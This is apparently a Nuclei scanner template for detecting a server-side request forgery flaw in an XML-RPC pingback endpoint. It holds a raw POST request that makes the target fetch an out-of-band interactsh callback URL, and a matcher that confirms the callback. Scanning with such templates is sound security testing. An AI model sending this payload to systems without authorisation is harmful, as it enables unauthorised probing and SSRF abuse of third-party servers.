id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik severity: high reference: - https://hackerone.com/reports/406387 tags: ssrf,generic,xmlrpc requests: - raw: - | POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 pingback.ping http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol words: - "http"